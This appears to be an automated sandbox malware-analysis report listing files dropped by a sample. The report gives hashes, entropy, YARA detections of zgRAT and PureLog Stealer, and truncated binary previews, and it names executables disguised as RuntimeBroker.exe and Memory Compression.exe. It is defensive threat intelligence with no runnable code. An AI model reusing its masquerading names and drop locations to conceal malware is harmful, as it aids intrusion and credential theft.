                                                  SHA-512:BEBD10C43C6FD06406C4998307C6CFFED7AF23285670C8121F09E87719FA5CC5F0ED2C5CBA0DE273FD21867C9BC44F63E42186F62B61CB9C7E8D861D878B8787
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 18%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i..i.\.i..b.\.i..g.\.`.].C.\..Y.R.\..\.a.\...a.\..^.a.\.Rich`.\.........PE..d...{S.e.........."....!.h...j......`..........@..........................................`.............................................4......P...............l0..............p....6..T....................7..(......@....................... ....................text....f.......h.................. ..`.rdata...(.......*...l..............@..@.data...\...........................@....pdata..l0.......2..................@..@.didat..`...........................@..._RDATA..\...........................@..@.rsrc...............................@..@.reloc..p...........................@..B........................................................................................................................................

                                                  C:\Recovery\1a5d5b8dcee3d8

                                                  Download File
                                                  Process:C:\Chaindriver.exe
                                                  File Type:ASCII text, with very long lines (318), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):318
                                                  Entropy (8bit):5.7853613236563355
                                                  Encrypted:false
                                                  SSDEEP:6:zScL+3MTSjP9g0IzVNs7EAb1xq3NENhPbu6WUr9cn:++TSjP9g0EswAbWduu6Tr9c
                                                  MD5:7C3C13820EE4D6FAD1DC95433C5AE693
                                                  SHA1:C0EB9224133F7D621487031C4F55D3F23A761D6B
                                                  SHA-256:4957601E3136F6AECDD8A8B7034B755D3D338EDACD0D3E01E67A32B26BD0D8B1
                                                  SHA-512:C1395E52D06A3CBA595E9E6A19D6E76FAA7BBA20FE6DA0A688378FFA308E3349753B5F750B143DC97BE2B3F042BD8ACD32A02EB8965DC820B2438CBFE4374CA6
                                                  Malicious:false
                                                  Preview:2tYtpSoowlwfYd46U21OiqZ1RjQvtTg2TPo0XWvytf3qboh3ZJSofxuLTgcFB24dE3MIzEi7GCeCxtanCXWkA2Xffcg14qw0lZlhbZDVkUhcSrYkGyDofUcMgqmXhrDaQobXH2LmTB9qU5NxE6vFnIUR7YBvwqx3RGMoPAdNmaUeUw2ldySl57xHTKas1a0nNGZNsihDcicMx06LgZR7XM7TTEVFkuVMkqRNXo25QPIXekTdNOLbI2PBIF4oNccsMQmHjty2hWrIEkytv11Vj3DraPFRtNrywaLO7M4eaS4wLH7iQL3VkGJTM4qTng

                                                  C:\Recovery\36c782484df200

                                                  Download File
                                                  Process:C:\Chaindriver.exe
                                                  File Type:ASCII text, with very long lines (873), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):873
                                                  Entropy (8bit):5.901154444640347
                                                  Encrypted:false
                                                  SSDEEP:24:ppL7Icx8zi+HYB9jH7LSO49S+wvADzci/CcuCMRZTq:ppocx0vujbT9+X/fHSZTq
                                                  MD5:7D1374C3F857B4DC7FB8D4CFF72B09D0
                                                  SHA1:1A37DF299BF5D3BBDB09F4F242220B42300D5AD5
                                                  SHA-256:AA60C9D05D3AFB1C74AA2665FD8A8BD430E9CCB4E3E2495DAC39819B390A7E8C
                                                  SHA-512:165B39CFAE6BE6DE2319DFA83F2756EE73DA3E9D4E430842071275797C13B810EBCAFE5F25F277D45389AC49ECDF6DF228DE467891263AE5FC43F4D3BFAC29AA
                                                  Malicious:false
                                                  Preview:Vhw9l7HitL7GpxR4m0w9Y6Ic5SxUPalxylib6ADm1NqsZq7zZRPi4qdZZTDSJxTTkKSEOz8mxJILPaDPV757KC2IIJCn6ucD3WIOX2kjTnvvhRJ9Py7M2WIhSK5FxVpCqFR3Sz2cWVngQGk09DXIxQLhNk5M6fv88tFc9QqZ6ezgtlRLjFGu7hOZ3upr3pf1koihBI0sW7MSapylTtm1YBBbepiPl9gQ986EDtKbOXY9U68O6DYJCocimHCVklHWb5TcstijjLnBmCGirTThkWOVfXb5ry0nPBhZmfgMeyk0Ab6kBdoRSjvFr87VRn2vVAvkeq6LxGDwwXUEb14NKjUpQcsniL516yfApVGUhdeMg9TTo33asolwpFUB8SmlKLz72TYFujpqEIJQJY9pRfISNtVjBEWP02BVKVbVeypJ94rh6D2jS7UpChtI8zDpNZ0MGxGx7oKcz9TTCym7Mx62hWSmmSWou95jDeaI7Elow1zDOZGKNGdZc8oufdLoRgr0DtPhXdAILSFpgPYMMMboggGFzpnd26WQK99eJjwtFUOK29OQF8cEEDUhnKrr0hPO5yfgQ4CmarjLS6N0bXY3eSLHpb191E3iE9ODdr9L5zoXdIPq71QdIVunnY1yCDvVyBGSrJWtXN8onyngMKC9xaZsOlaE0LI2DSicB68xehF5XG9yvUm1BwhYlYEGtR3MEFkUPKfPLOeQUdUHllTfiQ1RuK0n22EMn31SgojkzWpwRRDID6fH8YnyOSkET1XTKSnbmCl6BsqLkE9dHsk5W6OPQCDNEfQ79Wm9nmgAVjGPsbNKSG7lRc7NDXKj9Y1gcsMOcAzfMkkx08hyz348hpphYY5Pb6A6rjx9P

                                                  C:\Recovery\Memory Compression.exe

                                                  Download File
                                                  Process:C:\Chaindriver.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1917952
                                                  Entropy (8bit):7.53781423596998
                                                  Encrypted:false
                                                  SSDEEP:49152:R89kht8D3OiDl99jDZHVk+hBTw/uJNARR:RxhtxiRD/4+/Tw2JNAR
                                                  MD5:64F81209BCCE8D36D800FEEC26D75990
                                                  SHA1:B3E2F1B661ABC94D38B3BB471C7E0B75A1660D0F
                                                  SHA-256:B727092B2C5BCEAA3E910EEDFCEC738810BD531DA5EB58FBB11D253CA48D1FE2
                                                  SHA-512:2C5454A679D81A6F4C6CCFBC17D8DA2E06A517BFCF12DFCC8AFAD7F1041D98998446E81292E5D2CC1527DC4D334451E9F97BE366F0A8D2348B7AFC9CE9C828FA
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\Memory Compression.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\Memory Compression.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 70%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x.Zf.................<...........[... ...`....@.. ....................................@..................................[..K....`.. ............................................................................ ............... ..H............text....;... ...<.................. ..`.rsrc... ....`.......>..............@....reloc...............B..............@..B.................[......H.......................<....z...[.......................................0..........(.... ........8........E....).......M...`...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ........8....*....0.......... ........8........E............l.......`...8.......... ....8....~....(O... .... .... ....s....~....(S....... ....~....{....:....& ....8....r...ps....z*....~....(W...~....([... ....?.... ........8G...~....:.... ....~....{b...:-...& ....8"...

                                                  C:\Recovery\NOFqHeDosUIopsPGLT.exe

                                                  Download File
                                                  Process:C:\Chaindriver.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1917952
                                                  Entropy (8bit):7.53781423596998
                                                  Encrypted:false
                                                  SSDEEP:49152:R89kht8D3OiDl99jDZHVk+hBTw/uJNARR:RxhtxiRD/4+/Tw2JNAR
                                                  MD5:64F81209BCCE8D36D800FEEC26D75990
                                                  SHA1:B3E2F1B661ABC94D38B3BB471C7E0B75A1660D0F
                                                  SHA-256:B727092B2C5BCEAA3E910EEDFCEC738810BD531DA5EB58FBB11D253CA48D1FE2
                                                  SHA-512:2C5454A679D81A6F4C6CCFBC17D8DA2E06A517BFCF12DFCC8AFAD7F1041D98998446E81292E5D2CC1527DC4D334451E9F97BE366F0A8D2348B7AFC9CE9C828FA
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\NOFqHeDosUIopsPGLT.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\NOFqHeDosUIopsPGLT.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\NOFqHeDosUIopsPGLT.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\NOFqHeDosUIopsPGLT.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 70%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x.Zf.................<...........[... ...`....@.. ....................................@..................................[..K....`.. ............................................................................ ............... ..H............text....;... ...<.................. ..`.rsrc... ....`.......>..............@....reloc...............B..............@..B.................[......H.......................<....z...[.......................................0..........(.... ........8........E....).......M...`...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ........8....*....0.......... ........8........E............l.......`...8.......... ....8....~....(O... .... .... ....s....~....(S....... ....~....{....:....& ....8....r...ps....z*....~....(W...~....([... ....?.... ........8G...~....:.... ....~....{b...:-...& ....8"...

                                                  C:\Users\Default\Pictures\9e8d7a4ca61bd9

                                                  Download File
                                                  Process:C:\Chaindriver.exe
                                                  File Type:ASCII text, with very long lines (587), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):587
                                                  Entropy (8bit):5.8862628413604
                                                  Encrypted:false
                                                  SSDEEP:12:xYqlO8KfubtfJ47WrhLDp5OwkTnMM8Ec97dsY/PfHkRu+HMb565h+:xllvKg4aXp5OLT9lM68Hk2b53
                                                  MD5:26F3EED3F2AD0836EB0F2BAAC1AEB009
                                                  SHA1:E31F4422223C1187355E0E9EBC0055085D07A090
                                                  SHA-256:148D29D81B6CC00C786FC46FF821A58FA8DAEF3B2961896A19F29962703CDDF5
                                                  SHA-512:C137A52504685C3DF10F73FEC2BCCB00025DEE4F498C1DC3F737E745E1C2E4DA56F0866D4C4818299D1F42269F9F5AC71E0DA2F2B427962C272DBCF1D0916869
                                                  Malicious:false
                                                  Preview:vi7X5Q9RgTShBiUWNpQ1BCgl14KkHRvTJqZUYNL3T5XXAGfk9SpqWhitCWgAGZJOh9YUJ989eXiGoJkvZjkzmF6lIqSBrKx4wIzArKb9UqL98bE3vvlgyUmbDwMcr6RTkoUfTjDOIle537mqmZP6jQFcfY7588SYY2YUHijLrXXMzrhGJf0RqVuTi295mIQKTGhBiSiD0DOL22my00vcHArDIEwPinjjHN3sJgh16wbmGiapPLFvWxCSZd3dgTfMepEp94oTS4fUjE7jnG9XixNTKkSqmDVnRPIadvqUgvccSstUgT0aTInrbveYl8rOi2DT6gF2Zp1xUvAc17JTN5TJlb8sQSthEN3aoZYAO8AoR0WqvChnyYBni4sfhXlG6TtG1jxbjJEP4o1vES6OvFtqMP2ur3c0W4s7HPzLOFEoTvt3C6aPbXV0kC4mrDtprO2A64ozcu9pBEWag8sudNZ9i2XEUMeKWY7F2t7ISlwqXpzfpdGtV9Mdy3bDgjeQQzTmHRhxAkb2bsm3C1Y1GvzWMdQ9R3lsGgaiWNYY5SsvhUCFRiBpLnJe96ZnBifG8sv4SEgzcA5

                                                  C:\Users\Default\Pictures\RuntimeBroker.exe

                                                  Download File
                                                  Process:C:\Chaindriver.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1917952
                                                  Entropy (8bit):7.53781423596998
                                                  Encrypted:false
                                                  SSDEEP:49152:R89kht8D3OiDl99jDZHVk+hBTw/uJNARR:RxhtxiRD/4+/Tw2JNAR
                                                  MD5:64F81209BCCE8D36D800FEEC26D75990
                                                  SHA1:B3E2F1B661ABC94D38B3BB471C7E0B75A1660D0F
                                                  SHA-256:B727092B2C5BCEAA3E910EEDFCEC738810BD531DA5EB58FBB11D253CA48D1FE2
                                                  SHA-512:2C5454A679D81A6F4C6CCFBC17D8DA2E06A517BFCF12DFCC8AFAD7F1041D98998446E81292E5D2CC1527DC4D334451E9F97BE366F0A8D2348B7AFC9CE9C828FA
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\Pictures\RuntimeBroker.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Pictures\RuntimeBroker.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 70%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x.Zf.................<...........[... ...`....@.. ....................................@..................................[..K....`.. ............................................................................ ............... ..H............text....;... ...<.................. ..`.rsrc... ....`.......>..............@....reloc...............B..............@..B.................[......H.......................<....z...[.......................................0..........(.... ........8........E....).......M...`...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ........8....*....0.......... ........8........E............l.......`...8.......... ....8....~....(O... .... .... ....s....~....(S....... ....~....{....:....& ....8....r...ps....z*....~....(W...~....([... ....?.... ........8G...~....:.... ....~....{b...:-...& ....8"...

                                                  C:\Users\Public\Libraries\36c782484df200

                                                  Download File
                                                  Process:C:\Chaindriver.exe
                                                  File Type:ASCII text, with very long lines (322), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):322
                                                  Entropy (8bit):5.801479789505418
                                                  Encrypted:false
                                                  SSDEEP:6:W1t1NS9Py/DdvPCLvyhTcTqhDcBLaWeH3Nz8nu1ilKtHKkf9IRWLcn:W1/NS0/DdiT04TqhD4aWSd4u1iUqTR/n
                                                  MD5:442524B80F5B78B00AE69A07E3DA8E5B
                                                  SHA1:2BBB2C49EF0697482117572DE97D3DF81A3B5E90
                                                  SHA-256:6F48B28CBC69A6CB8A3716D4F3EF38785E17593A8500C8A3DE803B77B055DF6F
                                                  SHA-512:CFEF70647EDE81CB5FC08C0201CE32A26875C715D75B779C2925B4D2E3D8213ABA63410DC3BD01843FAC355693EAD5864B6F2DEA3F27950D40B651B4014F6516
                                                  Malicious:false
                                                  Preview:xaYJamAasaAJ4ISTAYtYK0NdhcL14MXS3lC8SbH7TIqB6O6Ahc6hyTI6N5m7bJggDsPTGUBiRwECKLhSfKTcP0dkcFuXzJgKmJ8N8n4NaYPBOGwCYTcQzDRNOo0AjnsIQ3ZANTU2PGB0kbWVTs9gqPVi2v9Uw4owpHvUrvzE9kBtCamwSeq1oMbBi0IcT9FVbOLcqBoi34gGNlfbINCRNwIcqtv0mWv9eqRyPKFQ0I8uqUx6UrUG7xHpGsw7Qy5gJgmhUrL7HwbFyXwV6yf5CoCrimrhXIACMblJsPmmfW8KVB0s5aAbSAded48sAok8wZ

                                                  C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe

                                                  Download File
                                                  Process:C:\Chaindriver.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1917952
                                                  Entropy (8bit):7.53781423596998
                                                  Encrypted:false
                                                  SSDEEP:49152:R89kht8D3OiDl99jDZHVk+hBTw/uJNARR:RxhtxiRD/4+/Tw2JNAR
                                                  MD5:64F81209BCCE8D36D800FEEC26D75990
                                                  SHA1:B3E2F1B661ABC94D38B3BB471C7E0B75A1660D0F
                                                  SHA-256:B727092B2C5BCEAA3E910EEDFCEC738810BD531DA5EB58FBB11D253CA48D1FE2
                                                  SHA-512:2C5454A679D81A6F4C6CCFBC17D8DA2E06A517BFCF12DFCC8AFAD7F1041D98998446E81292E5D2CC1527DC4D334451E9F97BE366F0A8D2348B7AFC9CE9C828FA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 70%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x.Zf.................<...........[... ...`....@.. ....................................@..................................[..K....`.. ............................................................................ ............... ..H............text....;... ...<.................. ..`.rsrc... ....`.......>..............@....reloc...............B..............@..B.................[......H.......................<....z...[.......................................0..........(.... ........8........E....).......M...`...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ........8....*....0.......... ........8........E............l.......`...8.......... ....8....~....(O... .... .... ....s....~....(S....... ....~....{....:....& ....8....r...ps....z*....~....(W...~....([... ....?.... ........8G...~....:.... ....~....{b...:-...& ....8"...

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Chaindriver.exe.log

                                                  Download File
                                                  Process:C:\Chaindriver.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1396
                                                  Entropy (8bit):5.350961817021757
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                  MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                  SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                  SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                  SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Memory Compression.exe.log

                                                  Download File
                                                  Process:C:\Recovery\Memory Compression.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1613
                                                  Entropy (8bit):5.370675888495854
                                                  Encrypted:false
                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktGqZ4vwmj0qD
                                                  MD5:5ACBB013936118762389287938AE0885
                                                  SHA1:12C6B0AA2B5238E3154F3B538124EE9DB0E496D6
                                                  SHA-256:28E292538199310B7DA27C6C743EFD34E1F806D28611B6C9EF4212D132272DEF
                                                  SHA-512:E803C699BE7FC25FF09D1DEE86412CE8F18834E22E20B7D036323B740891A64B2CE33D0E0BD075178F0B6F496BA9CFBF7EF1A0884FE5E470C8CCF6D824891C77
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NOFqHeDosUIopsPGLT.exe.log

                                                  Download File
                                                  Process:C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):847
                                                  Entropy (8bit):5.354334472896228
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                  C:\Users\user\AppData\Local\Temp\8xzCCjkggZ

                                                  Download File
                                                  Process:C:\Recovery\Memory Compression.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.103465189601646
                                                  Encrypted:false
                                                  SSDEEP:3:+efJFVTX:++TX
                                                  MD5:67F6B0A831C3211FC370A244DBD38C38
                                                  SHA1:F0FE2E1FCA5186928111C0A123A6720366B3C55D
                                                  SHA-256:DC45D6B2F7B7D5F3B289E46096711CC60777C2E1867B511E2A69DD844909D372
                                                  SHA-512:8E56FD19C70506E1360C714F63E27C055E20B87FB15C626557DDF93CB4E9B2E9256E77BAB08C9713C8D355BAD4E19BB69CB78B3027D8942277B568CECDE14219
                                                  Malicious:false
                                                  Preview:PBCBkTzgbEvPABfc23bf7HFPr

                                                  C:\Users\user\AppData\Local\Temp\RES953C.tmp

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d4, 10 symbols, created Thu Jan 2 08:09:23 2025, 1st section name ".debug$S"
                                                  Category:dropped
                                                  Size (bytes):1932
                                                  Entropy (8bit):4.533414842309649
                                                  Encrypted:false
                                                  SSDEEP:24:Hk29uXOXJTRoFDfH1wKpWN8luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+IlUZ:VXdRoZ2KwKluOulajfqXSfbNtmhI2Z
                                                  MD5:F0ADE884D3297CCAE34B4D6E80543E1A
                                                  SHA1:962E878B4A0502DBDC754B357CCD4E28D44CC999
                                                  SHA-256:75D3EAC4FB3FCB3BC6045B386590A89BAE3B2404566D4BEBD352B82F41D63E2E
                                                  SHA-512:58A2B3C412DE67278DC579752E240646D7AC06C723AFD21068F66DEEC06379D58F3F5C8E29FB00D1DD42FE17A9E1B12E30D45CAFCA19E9CCBA04A84063DC0EF8
                                                  Malicious:false
                                                  Preview:L....Ivg.............debug$S........$...................@..B.rsrc$01................P...........@..@.rsrc$02........p...d...............@..@........<....c:\Windows\System32\CSCE25282B3313D430FBB6BBFE2CFE4882.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES953C.tmp.-.<....................a..Microsoft (R) CVTRES.K.=..cwd.C:\.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...

                                                  C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2117940
                                                  Entropy (8bit):7.868424477636117
                                                  Encrypted:false
                                                  SSDEEP:49152:wZB1G8YjefBxKeUWwRHYv85Yoo3fGafaf0MgPzyFK:+3GwJx2xtQhaf0HyFK
                                                  MD5:B0A28FF93B030B10FD70698A5A7C27D0
                                                  SHA1:1A4BB1BDE02AF64D651E774C811282285B5C8063
                                                  SHA-256:CB3AF34EBD6827F396DE4A91329C45EC6ED5C623B004D2D932213C1E622A07D5
                                                  SHA-512:5172B92531979B6F328668978A8074E8724FFB62A599CE29394B09DD104ACF607B374CBCD2EA152642FAB5DE26D3EC924B63C4E37D1D1CA8042C288895C3F31B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 57%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i..i.\.i..b.\.i..g.\.`.].C.\..Y.R.\..\.a.\...a.\..^.a.\.Rich`.\.........PE..d...{S.e.........."....!.h...j......`..........@..........................................`.............................................4......P...............l0..............p....6..T....................7..(......@....................... ....................text....f.......h.................. ..`.rdata...(.......*...l..............@..@.data...\...........................@....pdata..l0.......2..................@..@.didat..`...........................@..._RDATA..\...........................@..@.rsrc...............................@..@.reloc..p...........................@..B........................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI75042\VCRUNTIME140.dll

                                                  Download File
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):96120
                                                  Entropy (8bit):6.440691568981583
                                                  Encrypted:false
                                                  SSDEEP:1536:dkb0wrlWxdV4tyfa/PUFSAM/HQUucN2f0MFOqH+F3fecbTUEuvw:dWD4eUp+HQpcNg0MFnH+F3fecbTUED
                                                  MD5:4A365FFDBDE27954E768358F4A4CE82E
                                                  SHA1:A1B31102EEE1D2A4ED1290DA2038B7B9F6A104A3
                                                  SHA-256:6A0850419432735A98E56857D5CFCE97E9D58A947A9863CA6AFADD1C7BCAB27C
                                                  SHA-512:54E4B6287C4D5A165509047262873085F50953AF63CA0DCB7649C22ABA5B439AB117A7E0D6E7F0A3E51A23E28A255FFD1CA1DDCE4B2EA7F87BCA1C9B0DBE2722
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~.[...[...[.......Y...R...P...[...w.......V.......K.......D.......Z......Z.......Z...Rich[...................PE..d....R^`.........." .........^......`.....................................................`A.........................................A..4....I...............`..L....T..x#..........H,..T............................,..8............................................text............................... ..`.rdata...?.......@..................@..@.data...@....P.......<..............@....pdata..L....`.......@..............@..@_RDATA.......p.......L..............@..@.rsrc................N..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI75042\_bz2.pyd

                                                  Download File
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):86704
                                                  Entropy (8bit):6.416293565012624
                                                  Encrypted:false
